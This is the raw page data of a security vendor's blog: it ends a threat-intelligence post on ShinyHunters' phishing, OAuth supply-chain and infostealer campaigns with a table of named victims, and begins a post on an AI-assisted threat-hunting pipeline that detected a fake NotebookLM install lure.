chain compromise, which has produced confirmed breaches at ",{"data":17406,"content":17407,"nodeType":940},{"uri":2885},[17408],{"data":17409,"marks":17410,"value":17411,"nodeType":883},{},[],"Vimeo",{"data":17413,"marks":17414,"value":17415,"nodeType":883},{},[]," (119,000 users), Rockstar Games (78.6 million records), and ",{"data":17417,"content":17419,"nodeType":940},{"uri":17418},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fzara-data-breach-exposed-personal-information-of-197-000-people\u002F",[17420],{"data":17421,"marks":17422,"value":17423,"nodeType":883},{},[],"Zara\u002FInditex",{"data":17425,"marks":17426,"value":17427,"nodeType":883},{},[]," (197,000 people), with further downstream victims likely still emerging. The ",{"data":17429,"content":17430,"nodeType":940},{"uri":2897},[17431],{"data":17432,"marks":17433,"value":17434,"nodeType":883},{},[],"Vercel breach",{"data":17436,"marks":17437,"value":17438,"nodeType":883},{},[],", which involved compromised OAuth tokens from Context.ai cascading into Google Workspace, also reinforces the same attack pattern (though it was likely not a ShinyHunters operation despite being claimed by someone pretending to be them).",{"data":17440,"content":17441,"nodeType":879},{},[17442],{"data":17443,"marks":17444,"value":17445,"nodeType":883},{},[],"A forgotten SaaS integration can easily become the pivot point for downstream compromise. The moment you authorize a third-party integration, your security boundary extends to include that vendor. If the third-party is compromised, every downstream customer organization with an active integration is exposed.",{"data":17447,"content":17448,"nodeType":905},{},[],{"data":17450,"content":17451,"nodeType":909},{},[17452],{"data":17453,"marks":17454,"value":17456,"nodeType":883},{},[17455],{"type":916},"The infostealer credential playbook sits alongside these attacks",{"data":17458,"content":17459,"nodeType":879},{},[17460,17464,17472],{"data":17461,"marks":17462,"value":17463,"nodeType":883},{},[],"Alongside the three vectors above, ShinyHunters has a track record of exploiting the infostealer credential economy at scale — and it predates any of them. The 2024 Snowflake campaign — 165+ customer environments compromised, over a billion records stolen from AT&T, Ticketmaster, Santander, and Advance Auto Parts among others — was built entirely on infostealer-harvested credentials replayed against MFA-less tenants, with ",{"data":17465,"content":17467,"nodeType":940},{"uri":17466},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Func5537-snowflake-data-theft-extortion",[17468],{"data":17469,"marks":17470,"value":17471,"nodeType":883},{},[],"Mandiant's investigation",{"data":17473,"marks":17474,"value":17475,"nodeType":883},{},[]," finding that 80% of compromised accounts had prior breach exposure in datasets dating back to 2020. The credentials were already circulating in criminal marketplaces; ShinyHunters simply purchased and operationalized them at industrial scale.",{"data":17477,"content":17478,"nodeType":879},{},[17479,17483,17491,17495,17503,17507,17515,17519,17527],{"data":17480,"marks":17481,"value":17482,"nodeType":883},{},[],"The same methodology powered the ",{"data":17484,"content":17486,"nodeType":940},{"uri":17485},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-attackers-are-targeting-jira-with-stolen-credentials\u002F",[17487],{"data":17488,"marks":17489,"value":17490,"nodeType":883},{},[],"HellCat Jira campaign",{"data":17492,"marks":17493,"value":17494,"nodeType":883},{},[]," through 2024–2025, and has now been industrialized as a standalone operation by ",{"data":17496,"content":17498,"nodeType":940},{"uri":17497},"https:\u002F\u002Fwww.halcyon.ai\u002Fjp\u002Fthreat-group\u002Fcoinbasecartel",[17499],{"data":17500,"marks":17501,"value":17502,"nodeType":883},{},[],"CoinbaseCartel",{"data":17504,"marks":17505,"value":17506,"nodeType":883},{},[],", another criminal group reported to be an offshoot of SLH. CoinbaseCartel's model is familiar: purchase old infostealer credentials, use them to access cloud and development environments, exfiltrate data, and demand ransom. ",{"data":17508,"content":17510,"nodeType":940},{"uri":17509},"https:\u002F\u002Fwww.infostealers.com\u002Farticle\u002Finside-the-coinbase-cartel-how-infostealer-credentials-fueled-a-100-company-ransomware-spree\u002F",[17511],{"data":17512,"marks":17513,"value":17514,"nodeType":883},{},[],"Hudson Rock's analysis",{"data":17516,"marks":17517,"value":17518,"nodeType":883},{},[]," of the group's 170+ claimed victims confirms that roughly 80% had prior infostealer infections predating the attacks. The most recent named victim is ",{"data":17520,"content":17522,"nodeType":940},{"uri":17521},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgrafana-says-stolen-github-token-let-hackers-steal-codebase\u002F",[17523],{"data":17524,"marks":17525,"value":17526,"nodeType":883},{},[],"Grafana",{"data":17528,"marks":17529,"value":17530,"nodeType":883},{},[],", where a GitHub token compromised via the TanStack npm supply chain attack and missed during credential rotation was used to download the codebase and attempt extortion. ",{"data":17532,"content":17533,"nodeType":905},{},[],{"data":17535,"content":17536,"nodeType":909},{},[17537],{"data":17538,"marks":17539,"value":17541,"nodeType":883},{},[17540],{"type":916},"These attacks all happen in the browser",{"data":17543,"content":17544,"nodeType":879},{},[17545,17549,17556],{"data":17546,"marks":17547,"value":17548,"nodeType":883},{},[],"Every one of these attack chains is a browser-based attack that either occurs in the browser (AiTM phishing, device code phishing) or could have been prevented at the browser layer (OAuth consent governance). The techniques are interchangeable — the",{"data":17550,"content":17551,"nodeType":940},{"uri":2443},[17552],{"data":17553,"marks":17554,"value":17555,"nodeType":883},{},[]," same criminal kits now offer AiTM and device code phishing side by side",{"data":17557,"marks":17558,"value":17559,"nodeType":883},{},[],", and the same threat actor (ShinyHunters) has used all three vectors across different campaigns within the same twelve-month period.",{"data":17561,"content":17562,"nodeType":879},{},[17563,17567,17574],{"data":17564,"marks":17565,"value":17566,"nodeType":883},{},[],"Additionally, infostealer infections themselves are increasingly delivered through browser-based methods like ",{"data":17568,"content":17570,"nodeType":940},{"uri":17569},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-malicious-copy-paste-detection",[17571],{"data":17572,"marks":17573,"value":316,"nodeType":883},{},[],{"data":17575,"marks":17576,"value":17577,"nodeType":883},{},[],", closing the loop between the credential supply side and the browser-layer detection point.",{"data":17579,"content":17580,"nodeType":1036},{},[17581],{"data":17582,"marks":17583,"value":17585,"nodeType":883},{},[17584],{"type":916},"How Push can help",{"data":17587,"content":17588,"nodeType":879},{},[17589],{"data":17590,"marks":17591,"value":17592,"nodeType":883},{},[],"Push operates at the exact point in each of these attack chains where automated intervention can still prevent the compromise. ",{"data":17594,"content":17595,"nodeType":879},{},[17596,17601],{"data":17597,"marks":17598,"value":17600,"nodeType":883},{},[17599],{"type":916},"For vishing + AiTM attacks, ",{"data":17602,"marks":17603,"value":17604,"nodeType":883},{},[],"Push's behavioral phishing detection analyzes and blocks the phishing page in real time by detecting it from the user's browser — regardless of the domains used, hosting infrastructure, or where the URL was delivered.  ",{"data":17606,"content":17607,"nodeType":879},{},[17608,17613],{"data":17609,"marks":17610,"value":17612,"nodeType":883},{},[17611],{"type":916},"For device code phishing,",{"data":17614,"marks":17615,"value":17616,"nodeType":883},{},[]," Push detects the phishing pages associated with device code phishing kits — including generic, technique-class detections that catch new kits without requiring kit-specific signatures. Second, Push provides an additional layer of protection on the legitimate device code authentication pages themselves, preventing users from entering attacker-supplied codes into them. Together, these detections cover both the kit-operated phishing infrastructure and the legitimate auth pages that the attack flow depends on.",{"data":17618,"content":17619,"nodeType":879},{},[17620,17625],{"data":17621,"marks":17622,"value":17624,"nodeType":883},{},[17623],{"type":916},"For OAuth supply chain attacks,",{"data":17626,"marks":17627,"value":17628,"nodeType":883},{},[]," Push's detects and controls OAuth consent flows at the browser layer — capturing which application is requesting access, what scopes it's requesting, and whether the grant should be permitted under organizational policy. Push customers can also block OAuth connection requests as they transit the browser, enabling security teams to stop unwanted integrations being added in the first place. ",{"data":17630,"content":17631,"nodeType":879},{},[17632,17637],{"data":17633,"marks":17634,"value":17636,"nodeType":883},{},[17635],{"type":916},"For the infostealer credential playbook,",{"data":17638,"marks":17639,"value":17640,"nodeType":883},{},[]," Push's stolen credential detection identifies when employees are using credentials that have appeared in breach datasets or dark web feeds — catching the moment a dormant infostealer credential surfaces at a browser-based login, as well as surfacing insecure login methods missing mitigating controls like MFA and enforcing them through in-browser guardrails. And on the supply side, Push's ClickFix detection addresses the browser-based delivery vector that is now the primary method for distributing infostealer malware in the first place.",{"data":17642,"content":17643,"nodeType":879},{},[17644,17647,17654],{"data":17645,"marks":17646,"value":21,"nodeType":883},{},[],{"data":17648,"content":17649,"nodeType":940},{"uri":12877},[17650],{"data":17651,"marks":17652,"value":17653,"nodeType":883},{},[],"Learn more about how you can use Push controls to protect your users from in-browser threats here. ",{"data":17655,"marks":17656,"value":21,"nodeType":883},{},[],{"data":17658,"content":17659,"nodeType":1036},{},[17660],{"data":17661,"marks":17662,"value":17664,"nodeType":883},{},[17663],{"type":916},"Closing thoughts",{"data":17666,"content":17667,"nodeType":879},{},[17668],{"data":17669,"marks":17670,"value":17671,"nodeType":883},{},[],"The campaigns documented in this post are not historical — they are ongoing, with new victims surfacing weekly and the underlying criminal infrastructure still actively developing. But the defensive strategy does not require anticipating which specific group, vector, or target sector comes next, because all of them converge on the same control point: the browser, where the attack begins or the integration decision is made. Organizations with browser-layer detection and OAuth governance in place have defense-in-depth against the full range of techniques these groups employ, regardless of which specific vector any given campaign uses.",{"data":17673,"content":17674,"nodeType":905},{},[],{"data":17676,"content":17677,"nodeType":879},{},[17678],{"data":17679,"marks":17680,"value":17681,"nodeType":883},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required. ",{"data":17683,"content":17684,"nodeType":879},{},[17685],{"data":17686,"marks":17687,"value":1736,"nodeType":883},{},[],{"data":17689,"content":17690,"nodeType":879},{},[17691,17694,17700],{"data":17692,"marks":17693,"value":21,"nodeType":883},{},[],{"data":17695,"content":17696,"nodeType":940},{"uri":3254},[17697],{"data":17698,"marks":17699,"value":3260,"nodeType":883},{},[],{"data":17701,"marks":17702,"value":21,"nodeType":883},{},[],{"data":17704,"content":17705,"nodeType":905},{},[],{"data":17707,"content":17708,"nodeType":909},{},[17709],{"data":17710,"marks":17711,"value":17713,"nodeType":883},{},[17712],{"type":916},"Appendix: named ShinyHunters victims since May 2025",{"data":17715,"content":17716,"nodeType":879},{},[17717,17721,17728],{"data":17718,"marks":17719,"value":17720,"nodeType":883},{},[],"To give an indication of the scale, the following table documents all publicly named victims attributed to ShinyHunters specifically since the Salesforce campaign began in May 2025. It is not exhaustive: ShinyHunters has claimed over 1,000 organizations in aggregate across its Salesforce campaigns alone, and many victims have not been publicly named. This list also doesn’t include the billion-plus records compromised in the 2024 Snowflake breaches. The major ransomware attacks executed against M&S, Co-op, and Jaguar Land Rover claimed by the ",{"data":17722,"content":17723,"nodeType":940},{"uri":7618},[17724],{"data":17725,"marks":17726,"value":17727,"nodeType":883},{},[],"Scattered Lapsus$ Hunters \"brand\"",{"data":17729,"marks":17730,"value":17731,"nodeType":883},{},[]," also aren't listed below. ",{"data":17733,"content":17734,"nodeType":8845},{},[17735,17782,17846,17894,17942],{"data":17736,"content":17737,"nodeType":8752},{},[17738,17749,17760,17771],{"data":17739,"content":17740,"nodeType":8766},{},[17741],{"data":17742,"content":17743,"nodeType":879},{},[17744],{"data":17745,"marks":17746,"value":17748,"nodeType":883},{},[17747],{"type":916},"Campaign",{"data":17750,"content":17751,"nodeType":8766},{},[17752],{"data":17753,"content":17754,"nodeType":879},{},[17755],{"data":17756,"marks":17757,"value":17759,"nodeType":883},{},[17758],{"type":916},"Began",{"data":17761,"content":17762,"nodeType":8766},{},[17763],{"data":17764,"content":17765,"nodeType":879},{},[17766],{"data":17767,"marks":17768,"value":17770,"nodeType":883},{},[17769],{"type":916},"Named victims",{"data":17772,"content":17773,"nodeType":8766},{},[17774],{"data":17775,"content":17776,"nodeType":879},{},[17777],{"data":17778,"marks":17779,"value":17781,"nodeType":883},{},[17780],{"type":916},"Confirmed impact",{"data":17783,"content":17784,"nodeType":8752},{},[17785,17809,17819,17829],{"data":17786,"content":17787,"nodeType":8766},{},[17788],{"data":17789,"content":17790,"nodeType":879},{},[17791,17796,17800,17805],{"data":17792,"marks":17793,"value":17795,"nodeType":883},{},[17794],{"type":916},"ShinyHunters Salesforce Vishing",{"data":17797,"marks":17798,"value":17799,"nodeType":883},{},[]," (vishing + device code phishing → Salesforce connected app authorization) \n\n& ",{"data":17801,"marks":17802,"value":17804,"nodeType":883},{},[17803],{"type":916},"Salesloft\u002FDrift Supply Chain",{"data":17806,"marks":17807,"value":17808,"nodeType":883},{},[]," (stolen OAuth tokens → downstream Salesforce access)",{"data":17810,"content":17811,"nodeType":8766},{},[17812],{"data":17813,"content":17814,"nodeType":879},{},[17815],{"data":17816,"marks":17817,"value":17818,"nodeType":883},{},[],"May 2025",{"data":17820,"content":17821,"nodeType":8766},{},[17822],{"data":17823,"content":17824,"nodeType":879},{},[17825],{"data":17826,"marks":17827,"value":17828,"nodeType":883},{},[],"Coca-Cola Europacific Partners, Cisco, Qantas, LVMH, Adidas, Google, Chanel, Pandora, Allianz Life, Air France-KLM, Farmers Insurance, Workday, TransUnion, Stellantis, Kering, Odido, Hallmark, Salesloft (origin), Toast, Avalara, Fastly, Cato Networks, Cloudflare, Palo Alto Networks, Zscaler, Tenable, Elastic, JFrog, CyberArk, Rubrik, BeyondTrust, Proofpoint, Workiva, Mercer Advisors, Beacon Pointe, Ameriprise, Kemper, Udemy, 7-Eleven, Mytheresa, Marcus & Millichap, Carnival, Pitney Bowes, Alert 360, Amtrak, McGraw-Hill, Canada Life, Charter Communications",{"data":17830,"content":17831,"nodeType":8766},{},[17832,17839],{"data":17833,"content":17834,"nodeType":879},{},[17835],{"data":17836,"marks":17837,"value":17838,"nodeType":883},{},[],"49 named victims. Confirmed individual impact includes 23M+ records (Coca-Cola), 5.7M records (Qantas), 6.2M customers (Odido), 4.4M consumers (TransUnion), up to 18M records (Stellantis), 13.5M emails (McGraw-Hill), 8.2M emails (Pitney Bowes), 7.5M emails (Carnival), 7-Eleven: 185K confirmed by HIBP (SSNs, driver's licenses; franchisee data), Charter Communications: millions of records claimed (company disputes scope). ",{"data":17840,"content":17841,"nodeType":879},{},[17842],{"data":17843,"marks":17844,"value":17845,"nodeType":883},{},[],"ShinyHunters claims 1.5B+ Salesforce records across 1,000+ organizations total.",{"data":17847,"content":17848,"nodeType":8752},{},[17849,17864,17874,17884],{"data":17850,"content":17851,"nodeType":8766},{},[17852],{"data":17853,"content":17854,"nodeType":879},{},[17855,17860],{"data":17856,"marks":17857,"value":17859,"nodeType":883},{},[17858],{"type":916},"Vishing + AiTM SSO",{"data":17861,"marks":17862,"value":17863,"nodeType":883},{},[]," (vishing → AiTM phishing page → SSO session capture → SaaS data exfiltration)",{"data":17865,"content":17866,"nodeType":8766},{},[17867],{"data":17868,"content":17869,"nodeType":879},{},[17870],{"data":17871,"marks":17872,"value":17873,"nodeType":883},{},[],"Aug 2025",{"data":17875,"content":17876,"nodeType":8766},{},[17877],{"data":17878,"content":17879,"nodeType":879},{},[17880],{"data":17881,"marks":17882,"value":17883,"nodeType":883},{},[],"SoundCloud, GrubHub, Panera Bread, Match Group, Crunchbase, Betterment, CarMax, Edmunds, CarGurus, Hims & Hers, University of Pennsylvania, Harvard University, Optimizely, TELUS Digital, Crunchyroll, ADT",{"data":17885,"content":17886,"nodeType":8766},{},[17887],{"data":17888,"content":17889,"nodeType":879},{},[17890],{"data":17891,"marks":17892,"value":17893,"nodeType":883},{},[],"16 named victims. Confirmed individual impact includes ~30M records (SoundCloud), ~14M records (Panera), 10M+ records (Match Group), ~20M records (Betterment), 5.5M people (ADT), 1M+ records (UPenn), ~1PB stolen from TELUS Digital ($65M ransom refused).",{"data":17895,"content":17896,"nodeType":8752},{},[17897,17912,17922,17932],{"data":17898,"content":17899,"nodeType":8766},{},[17900],{"data":17901,"content":17902,"nodeType":879},{},[17903,17908],{"data":17904,"marks":17905,"value":17907,"nodeType":883},{},[17906],{"type":916},"Anodot Supply Chain",{"data":17909,"marks":17910,"value":17911,"nodeType":883},{},[]," (stolen OAuth tokens → downstream Snowflake\u002FBigQuery access)",{"data":17913,"content":17914,"nodeType":8766},{},[17915],{"data":17916,"content":17917,"nodeType":879},{},[17918],{"data":17919,"marks":17920,"value":17921,"nodeType":883},{},[],"Apr 2026",{"data":17923,"content":17924,"nodeType":8766},{},[17925],{"data":17926,"content":17927,"nodeType":879},{},[17928],{"data":17929,"marks":17930,"value":17931,"nodeType":883},{},[],"Anodot\u002FGlassbox (origin), Rockstar Games, Vimeo, Zara\u002FInditex",{"data":17933,"content":17934,"nodeType":8766},{},[17935],{"data":17936,"content":17937,"nodeType":879},{},[17938],{"data":17939,"marks":17940,"value":17941,"nodeType":883},{},[],"4 named victims (12+ total claimed). 78.6M records (Rockstar Games), 197K individuals (Zara), 119K individuals (Vimeo).",{"data":17943,"content":17944,"nodeType":8752},{},[17945,17960,17969,17979],{"data":17946,"content":17947,"nodeType":8766},{},[17948],{"data":17949,"content":17950,"nodeType":879},{},[17951,17956],{"data":17952,"marks":17953,"value":17955,"nodeType":883},{},[17954],{"type":916},"Other SLH-attributed",{"data":17957,"marks":17958,"value":17959,"nodeType":883},{},[]," (misc. vectors including infostealer chains, CI\u002FCD supply chain, SaaS platform compromise)",{"data":17961,"content":17962,"nodeType":8766},{},[17963],{"data":17964,"content":17965,"nodeType":879},{},[17966],{"data":17967,"marks":17968,"value":17818,"nodeType":883},{},[],{"data":17970,"content":17971,"nodeType":8766},{},[17972],{"data":17973,"content":17974,"nodeType":879},{},[17975],{"data":17976,"marks":17977,"value":17978,"nodeType":883},{},[],"UK Legal Aid Agency, Mixpanel, Wynn Resorts, Woflow, Vercel, European Commission, Mercor, Medtronic, Instructure",{"data":17980,"content":17981,"nodeType":8766},{},[17982],{"data":17983,"content":17984,"nodeType":879},{},[17985],{"data":17986,"marks":17987,"value":17988,"nodeType":883},{},[],"10 named victims across varied vectors. Notable: Vercel (Lumma Stealer → Context.ai OAuth app → Google Workspace), European Commission (poisoned Trivy GitHub Action → 340GB across 71 EU entities)",{"data":17990,"content":17991,"nodeType":879},{},[17992],{"data":17993,"marks":17994,"value":21,"nodeType":883},{},[],"The three attack techniques behind ShinyHunters' 2026 campaigns ","ShinyHunters' breach of Instructure is the latest in a long series of attacks. Here's our view of the big picture. ","analyzing-the-instructure-breach",{"items":17999},[18000,18002],{"sys":18001,"name":3273},{"id":3272},{"sys":18003,"name":343},{"id":3276},{"items":18005},[18006],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":18007},{"url":872},"7-things-we-learned-from-john-hammond","blog\u002F7-things-we-learned-from-john-hammond",{"json":18011},{"data":18012,"content":18013,"nodeType":875},{},[18014],{"data":18015,"content":18016,"nodeType":879},{},[18017],{"data":18018,"marks":18019,"value":18020,"nodeType":883},{},[],"Luke Jennings (Push VP of Research) and John Hammond (Senior Principal Security Researcher, Huntress) walked through the browser-based attack techniques defining the 2026 threat landscape.","Here are 7 things we learned from our conversation with John Hammond on the \"Why the browser is the new battleground\" webinar. ",{"id":18023,"publishedAt":18024},"6V12IJexyAkFFVIrbwlNPq","2026-08-12T12:00:57.289Z",{"items":18026},[18027,18029],{"sys":18028,"name":3273},{"id":3272},{"sys":18030,"name":298},{"id":6696},{"items":18032},[18033,18035,18037,18039,18041,18043,18045,18047,18049,18051,18053,18055,18057,18059,18061,18063,18065,18067,18069,18071,18073,18075],{"sys":18034,"name":280,"slug":281,"tier":31},{"id":277},{"sys":18036,"name":521,"slug":522,"tier":31},{"id":518},{"sys":18038,"name":415,"slug":416,"tier":31},{"id":412},{"sys":18040,"name":298,"slug":299,"tier":31},{"id":295},{"sys":18042,"name":343,"slug":344,"tier":31},{"id":340},{"sys":18044,"name":235,"slug":236,"tier":31},{"id":232},{"sys":18046,"name":262,"slug":263,"tier":45},{"id":259},{"sys":18048,"name":316,"slug":317,"tier":45},{"id":313},{"sys":18050,"name":361,"slug":362,"tier":45},{"id":358},{"sys":18052,"name":486,"slug":487,"tier":45},{"id":483},{"sys":18054,"name":477,"slug":478,"tier":45},{"id":474},{"sys":18056,"name":512,"slug":513,"tier":45},{"id":509},{"sys":18058,"name":325,"slug":326,"tier":45},{"id":322},{"sys":18060,"name":573,"slug":574,"tier":45},{"id":570},{"sys":18062,"name":468,"slug":469,"tier":45},{"id":465},{"sys":18064,"name":442,"slug":443,"tier":45},{"id":439},{"sys":18066,"name":607,"slug":608,"tier":45},{"id":604},{"sys":18068,"name":379,"slug":380,"tier":45},{"id":376},{"sys":18070,"name":433,"slug":434,"tier":45},{"id":430},{"sys":18072,"name":450,"slug":451,"tier":45},{"id":447},{"sys":18074,"name":495,"slug":496,"tier":45},{"id":492},{"sys":18076,"name":244,"slug":245,"tier":45},{"id":241},"q4U5IPhRMZseIs6ceVJ_ZzUpucxUy-2TaBbYB9CbBVE",{"id":18079,"title":18080,"authorsCollection":18081,"content":18085,"extension":228,"faqItemsCollection":19163,"faqTitle":59,"featured":19,"hashTags":59,"meta":19165,"metaTitle":19166,"ogImage":59,"postType":1962,"publishedDate":19167,"relatedBlogPostsCollection":19168,"slug":21187,"stem":21188,"subtitle":59,"summary":21189,"synopsis":21200,"sys":21201,"tagsCollection":21204,"topicsCollection":21210,"__hash__":21246},"blog\u002Fblog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline.json","Can AI replace a threat researcher? What we learned building an agentic threat hunting pipeline",{"items":18082},[18083],{"fullName":4797,"firstName":4798,"jobTitle":4799,"socialLinks":59,"profilePicture":18084},{"url":4801},{"json":18086,"links":19019},{"data":18087,"content":18088,"nodeType":875},{},[18089,18096,18117,18129,18136,18144,18151,18173,18180,18187,18194,18206,18212,18215,18223,18239,18258,18368,18374,18381,18387,18395,18402,18414,18421,18427,18434,18457,18464,18471,18477,18480,18488,18495,18503,18510,18526,18533,18540,18548,18555,18562,18570,18577,18584,18587,18595,18602,18610,18617,18624,18631,18638,18646,18653,18685,18692,18699,18705,18712,18720,18727,18805,18811,18819,18835,18842,18848,18855,18871,18874,18882,18889,18896,18902,18909,18953,18960,18967,18974,18980,18983,18991,18997,19003],{"data":18090,"content":18091,"nodeType":879},{},[18092],{"data":18093,"marks":18094,"value":18095,"nodeType":883},{},[],"In March, our threat hunting engine flagged something it hadn’t seen before.",{"data":18097,"content":18098,"nodeType":879},{},[18099,18103,18113],{"data":18100,"marks":18101,"value":18102,"nodeType":883},{},[],"Our research team had already been tracking the growing use of ",{"data":18104,"content":18108,"nodeType":18112},{"target":18105},{"sys":18106},{"id":18107,"type":976,"linkType":977},"2U6QpQ9rkY8x5ES48okHZB",[18109],{"data":18110,"marks":18111,"value":443,"nodeType":883},{},[],"entry-hyperlink",{"data":18114,"marks":18115,"value":18116,"nodeType":883},{},[]," tied to phishing campaigns. Malvertising frequently targets users via Google Search results, inserting malicious ads or redirects in place of legitimate ads, and using the familiar context of the search results page to trick users into clicking.",{"data":18118,"content":18119,"nodeType":879},{},[18120,18124],{"data":18121,"marks":18122,"value":18123,"nodeType":883},{},[],"To defend Push customers against this threat, we needed a way to spot malicious activity arising from clicking on Google ads. ",{"data":18125,"marks":18126,"value":18128,"nodeType":883},{},[18127],{"type":891},"But how to separate signal from noise?",{"data":18130,"content":18131,"nodeType":879},{},[18132],{"data":18133,"marks":18134,"value":18135,"nodeType":883},{},[],"Our hunt combined the skills of human researchers and AI agents to find 12 meaningful results from trillions of browser events visible to the Push extension across our install base.",{"data":18137,"content":18138,"nodeType":879},{},[18139],{"data":18140,"marks":18141,"value":18143,"nodeType":883},{},[18142],{"type":916},"Of those, one was novel. ",{"data":18145,"content":18146,"nodeType":879},{},[18147],{"data":18148,"marks":18149,"value":18150,"nodeType":883},{},[],"A user had searched for NotebookLM, clicked a paid Google ad, and gotten redirected to a page impersonating NotebookLM. The page itself was just a facade fronting a Cloudflare Pages-hosted phishing kit with a WebAssembly C2 connector. To the user, it looked like a completely on-brand NotebookLM page, and if they had run the fake install prompt, they would have installed malware. (Note: NotebookLM doesn’t even require a local install, but the page was convincing enough — and AI platforms are changing so quickly — that the lure was extremely believable.)",{"data":18152,"content":18153,"nodeType":879},{},[18154,18159,18169],{"data":18155,"marks":18156,"value":18158,"nodeType":883},{},[18157],{"type":916},"We had found our first in-the-wild ",{"data":18160,"content":18163,"nodeType":18112},{"target":18161},{"sys":18162},{"id":9708,"type":976,"linkType":977},[18164],{"data":18165,"marks":18166,"value":18168,"nodeType":883},{},[18167],{"type":916},"InstallFix attack",{"data":18170,"marks":18171,"value":1350,"nodeType":883},{},[18172],{"type":916},{"data":18174,"content":18175,"nodeType":879},{},[18176],{"data":18177,"marks":18178,"value":18179,"nodeType":883},{},[],"Within minutes, our analysis agents created detections, and researchers shipped a new detection to every Push customer. ",{"data":18181,"content":18182,"nodeType":879},{},[18183],{"data":18184,"marks":18185,"value":18186,"nodeType":883},{},[],"Eighteen months ago, it would have taken a human analyst days or even weeks to unpack the attack, comb through web requests, de-obfuscate web code, trace JavaScript execution, and extract signals of tactics, techniques, and procedures (TTPs) beyond short-lived single-use IOCs like domain name, then get their work coded up as a detection and deployed to customers. ",{"data":18188,"content":18189,"nodeType":879},{},[18190],{"data":18191,"marks":18192,"value":18193,"nodeType":883},{},[],"That was viable when new tools or techniques showed up once or twice a quarter. It doesn’t stand a chance when attack evolutions occur weekly or even daily. That’s the reality now with AI-generated adversary tools.",{"data":18195,"content":18196,"nodeType":879},{},[18197,18202],{"data":18198,"marks":18199,"value":18201,"nodeType":883},{},[18200],{"type":916},"So, can AI agents replace human threat researchers?",{"data":18203,"marks":18204,"value":18205,"nodeType":883},{},[]," That’s the wrong question. Can AI agents massively scale the expertise of a seasoned human threat hunter without getting bored of repetitive tasks, missing pertinent but easily overlooked details, or creating operational siloes dependent on one person’s knowledge — and do its work continuously across trillions of data points? Yes, absolutely.",{"data":18207,"content":18211,"nodeType":971},{"target":18208},{"sys":18209},{"id":18210,"type":976,"linkType":977},"3OiZ7BrViCTTMmHUAbloEt",[],{"data":18213,"content":18214,"nodeType":905},{},[],{"data":18216,"content":18217,"nodeType":909},{},[18218],{"data":18219,"marks":18220,"value":18222,"nodeType":883},{},[18221],{"type":916},"Why scaling browser threat detection requires more than more analysts",{"data":18224,"content":18225,"nodeType":879},{},[18226,18230,18235],{"data":18227,"marks":18228,"value":18229,"nodeType":883},{},[],"Already this year, we’ve ",{"data":18231,"marks":18232,"value":18234,"nodeType":883},{},[18233],{"type":916},"tripled",{"data":18236,"marks":18237,"value":18238,"nodeType":883},{},[]," the cumulative number of detections shipped to Push customers using this pipeline. That output points to the first problem we set out to solve by employing AI agents: Scaling our research team’s considerable expertise.",{"data":18240,"content":18241,"nodeType":879},{},[18242,18246,18254],{"data":18243,"marks":18244,"value":18245,"nodeType":883},{},[],"Push’s R&D team are experts at understanding and unpacking modern browser-based attacks. This is essential when you consider how quickly attacks themselves are evolving. When we created the ",{"data":18247,"content":18250,"nodeType":18112},{"target":18248},{"sys":18249},{"id":7130,"type":976,"linkType":977},[18251],{"data":18252,"marks":18253,"value":7187,"nodeType":883},{},[],{"data":18255,"marks":18256,"value":18257,"nodeType":883},{},[]," in 2023 (then called the SaaS Attacks Matrix), many of the ideas in it were theoretical. Not anymore. ",{"data":18259,"content":18260,"nodeType":1531},{},[18261,18271,18294],{"data":18262,"content":18263,"nodeType":1535},{},[18264],{"data":18265,"content":18266,"nodeType":879},{},[18267],{"data":18268,"marks":18269,"value":18270,"nodeType":883},{},[],"We’ve tracked the rise of AiTM phish kits from their status as MFA-bypassing novelties to the emergence of an entire criminal ecosystem built around increasingly sophisticated Phishing-as-a-Service tools. ",{"data":18272,"content":18273,"nodeType":1535},{},[18274],{"data":18275,"content":18276,"nodeType":879},{},[18277,18281,18290],{"data":18278,"marks":18279,"value":18280,"nodeType":883},{},[],"We imagined the simple but effective power of using device code authorization for phishing three years ago; in the last few months, we’ve detected a 37x increase in ",{"data":18282,"content":18285,"nodeType":18112},{"target":18283},{"sys":18284},{"id":13311,"type":976,"linkType":977},[18286],{"data":18287,"marks":18288,"value":18289,"nodeType":883},{},[],"device code phishing attacks",{"data":18291,"marks":18292,"value":18293,"nodeType":883},{},[]," across our install base. ",{"data":18295,"content":18296,"nodeType":1535},{},[18297],{"data":18298,"content":18299,"nodeType":879},{},[18300,18304,18313,18317,18326,18330,18340,18343,18351,18354,18364],{"data":18301,"marks":18302,"value":18303,"nodeType":883},{},[],"We were also the first to detect a novel post-authorization attack we dubbed ",{"data":18305,"content":18309,"nodeType":18112},{"target":18306},{"sys":18307},{"id":18308,"type":976,"linkType":977},"71EaaK7lfl6bQBbkAU0qjv",[18310],{"data":18311,"marks":18312,"value":1321,"nodeType":883},{},[],{"data":18314,"marks":18315,"value":18316,"nodeType":883},{},[]," that combines OAuth consent phishing and ClickFix-style user prompts; reported on the rise of the ridiculously simple yet effective ",{"data":18318,"content":18321,"nodeType":18112},{"target":18319},{"sys":18320},{"id":9708,"type":976,"linkType":977},[18322],{"data":18323,"marks":18324,"value":18325,"nodeType":883},{},[],"InstallFix technique",{"data":18327,"marks":18328,"value":18329,"nodeType":883},{},[]," described earlier; and detected an array of other 